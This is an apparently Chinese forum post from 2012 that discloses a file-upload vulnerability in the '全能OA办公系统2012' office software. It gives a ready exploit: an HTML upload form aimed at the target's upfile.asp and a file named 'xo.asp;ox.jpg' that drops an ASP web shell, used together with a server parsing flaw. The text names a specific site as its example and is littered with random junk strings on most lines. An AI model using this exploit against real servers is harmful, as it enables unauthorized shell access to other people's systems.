全能OA办公系统 上传漏洞
0 [- @2 N% v2 Q. p: z1 B/ s. `& q9 M2 L$ q# L
系统介绍:# {. D8 U- ]+ t. B7 O" |
& _* s4 G$ x9 F4 l# x全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
# |. R3 c a" e% z# ]1 Q
! C) Y, r* w+ Z% z& p主要功能:. m( _3 U- o/ C4 m' G
公司通告 % J+ {# g7 Q2 y$ q
工作计划
2 r u/ G; S( J3 O' t; |通讯助理
7 d. M0 Q* j5 ~0 j* m8 b客户资源 6 B; _. M7 _- K9 O4 a% Y N- Z6 O
我的公文
; W5 V+ A' x; q公文传阅 8 T- X6 ` g% w/ d& N0 y
公共资源
! ^8 W5 X2 F/ _资源预约
' Q9 d, D( G9 D9 M3 b今日考勤
6 i5 V$ V4 r; B& j, B2 L- i个人计划 # O. a7 j/ X1 j. ] H/ e: ^; l
个人通讯录
& v; @& M# @ B. W# y9 \个人基本档案
4 r8 ?2 \- E8 `4 ^未读邮件 * w* s. s% L' ~( H g
发邮件
# R! |2 ?- O' w6 x& k7 F W收件夹 W3 @8 W* B! k9 C" `! b
寄件夹
8 @/ a) E" c& w7 W$ p! `网络硬盘 ! Z4 D* _' H& w9 z
网络会议
5 i0 x1 K5 @- [7 ?3 ~8 P3 U& W网络调查
/ x9 y+ U3 V% Z$ ^, G' u4 R交流论坛
' z8 m. s7 k2 G4 S: H3 \
# b5 v9 k( z) C$ O; F% k! |$ v! ~有兴趣测试的朋友可以下源码看看
2 ^6 r B" S" H7 Z: D* ^% c) o. v
源码下载:, G: g$ E+ ~5 U$ W# H
, Y7 m! [% ~7 J
http://www.mycodes.net/30/4750.htm
: s. P5 Z8 ], b& `% C5 Q2 n; l8 q, ]1 V+ ?2 q. L6 P7 q
漏洞介绍:' c6 W) F+ E: m. V/ i
V o* `3 Q, H4 C由upfile.asp上传文件漏洞引起
! V5 w7 h0 h$ N( s: N
% y, \ S- |/ U( v8 T9 W+ A1 }测试方法:4 I- k6 M8 B( g
# h0 b: P7 D8 i# I% A
使用名小子上传http://www.itlynn.com/upfile.asp即可
. m4 o) A+ o( M3 h7 E
2 n a5 s. W8 s, v# t7 A如果upfile.asp文件被删除不存在。
8 P; w8 z9 b! _! a+ f; @% r( m, I- H/ r
2 @5 o9 N) N9 E8 z1 ]+ y$ \( d 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
# @+ c: ~5 B7 F6 a* b- T" G4 ?
' e4 f0 X$ s- P3 X如果存在那么将如下代码保存为upfile.html。3 f3 |4 @# D: G6 Y5 x# B) X
# j% H% k3 G, G! I0 r) P$ H6 v5 m8 ^
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。) Q9 K) y+ s5 |: ~- {
7 B7 I3 O& W6 \8 A7 z8 B
. s' @, ]& s$ J, Z$ `# j! F
1 d& G' x. L$ ?6 P01 <table border='0' align="center" cellpadding="5">
+ N) @9 c4 p3 g5 F' @4 ?% z+ Z# q; z* L) l4 i, j
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
0 i6 t- g! ]! A0 m- R2 K- B2 o/ v# ?5 T. i
03 <tr>
6 X! X* |, k: t8 I2 W6 w" |" }+ m- p
04 <td>报错:</td>
7 e7 s1 { Y1 I- ^. p4 a, b7 p2 \' J! B1 E8 o2 B% B2 h1 a0 |: i
05 <td><input type='radio' name='errnumber' value='0'> + J2 e* S( a2 f! A2 _
1 Y, H! R% R% K" Y6 A$ ]3 o. q0 D. f
06 自动更名 7 ?7 ?: f$ U7 }4 d% @( q+ b/ f& a8 o
( S$ y7 q- F+ S: q
07 <input type='radio' name='errnumber' value='1' checked> , @# V& ^% n; R) Q N7 O o6 G
7 ^+ i# _6 ^2 Z0 L
08 报错方式 9 o) Z V0 |* f9 j1 Y k' T1 V
+ ^& r9 H1 N# ?/ Q, p% `0 u: z
09 <input type='radio' name='errnumber' value='2'> 5 ?2 X3 f/ D' m2 t. j: B& q/ Y
. z J# `! }5 l* S- d
10 直接覆盖</td>
4 c" C6 | k& i! o3 z( D1 c/ x4 M7 s
11 </tr> ; o: z2 U5 l* H( F/ }
) F6 b/ g5 V( H: k) \4 P12 <tr>
$ z1 `) b {' ]$ ^+ s& W% ^+ K! ? j. k
13 <td>主题:</td>
. G1 V; u" C9 G) i/ \: x5 M' X( a8 V8 u8 z" u. I0 p7 ]
14 <td><input type='text' name='filename' size='30'></td> 5 e/ I# _- h o& J. a9 o( W
3 ~# d! L7 L% p& `8 S; s9 {
15 </tr> % M9 b" e2 r9 D q# U
& v \# } N4 v- m; x% K
16 <tr>
9 K$ S$ f, d( X/ T4 X* U6 Z$ A1 D+ D% T9 Q4 t
17 <td>文件:</td>
- r- K+ ^1 [: i% B/ ]- e \+ k, L/ D( X# \5 y1 [/ f
18 <td><input type="file"name="fruit"size="30"></td> 1 ]4 s4 A5 A# K/ `" }
5 e9 Q8 u1 j" w# b: o1 `5 |
19 </tr> : W! v% R- i% r+ D& C. Y6 S
" q, z k% _; C. @8 T4 D. j$ U20 <tr>
1 M, S5 l2 r1 ^, c$ D4 Z; V# ^/ u- @5 N( f* A
21 <td valign='top'>简介:</td>
% P( r- K3 c) T5 }7 X F8 h5 s
+ s& I4 g* i! t22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
, f4 Y% {' |% n, W* _
% f) K0 W; ]7 q1 ]$ \23 </tr>
" u3 O) F4 d+ u5 s4 u2 }, M% E" h9 ^( E W2 A- p3 _+ ~% m; O
24 % U4 O1 t; M5 {" p& n
- r( s# G% ^3 p. ~25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
" u* x, f7 Q/ U/ J) e; s4 w4 z ?. M& k/ A9 q
26 </tr>
1 t4 [- N. J/ l0 E/ ^& L ~! i9 z4 _2 L! ]: F- ]: o: F1 L
27 </form> . p m" |: W$ i0 L
: M8 b3 U; Z C+ {, G; D
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
% }& \, k8 P& c
$ W8 y: B* e9 d0 Q, ]1 T# g& H2 b+ u2 L * i2 E1 i& T5 y: B6 k( i. @
: P0 P3 K) W8 Q+ N' S上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg; J) U }4 F5 r7 J. t& \
* F4 ] T' C" s* F# u6 z此漏洞需要配合解析漏洞利用。
8 Q3 N! d ] f% w9 o3 X4 X5 d1 t& d7 J$ S6 }& P$ \& @: p
|
发表于 2012-11-21 13:45:12
收藏
支持
反对